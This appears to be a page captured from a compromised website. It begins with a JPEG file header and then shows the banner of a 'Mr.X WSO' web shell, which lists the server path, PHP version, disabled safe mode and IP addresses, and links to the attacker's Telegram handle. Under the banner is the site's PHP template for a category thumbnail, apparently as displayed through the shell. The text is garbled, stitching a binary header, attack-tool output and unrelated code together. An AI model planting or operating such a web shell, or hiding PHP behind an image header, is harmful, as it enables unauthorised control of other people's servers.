����JFIF���������
| Attention: Uname: Php: Hdd: Cwd: | Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet 5.3.29 Safe mode: OFF Datetime: 2026-04-09 13:22:36 1999.30 GB Free: 72.18 GB (3%) /home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.54 Client IP: 216.73.216.53 |
| [ Files ] | [ Logout ] |
|---|
<?php
$link = generateUrl('channel', $row['name'], $row['record_num']);
$classMods = $args && $args['mods'] ? $args['mods'] : '';
?>
<!-- citem :: column :: start -->
<div class="citem col <?php echo $classMods; ?>">
<div class="citem__inner">
<a class="citem__link" href="<?php echo $link; ?>" title="<?php echo htmlentities($row['name'], ENT_QUOTES, 'UTF-8'); ?>">
<span class="citem__thumb">
<?php if (file_exists("$misc_path/cat{$row[record_num]}.jpg")) { ?>
<img class="citem__thumb-img" src="<?php echo "$misc_url/cat{$row[record_num]}.jpg"; ?>" alt="<?php echo htmlentities($row['name'], ENT_QUOTES, 'UTF-8'); ?>">
<?php } else { ?>
<img class="citem__thumb-img" src="<? echo $basehttp; ?>/core/images/catdefault.jpg" alt="<? echo htmlentities($row['name'], ENT_QUOTES, 'UTF-8'); ?>" >
<?php } ?>
</span>
<span class="citem__bd">
<span class="citem__title"><?php echo $row['name']; ?></span>
</span>
</a>
</div>
</div>
<!-- citem :: column :: end -->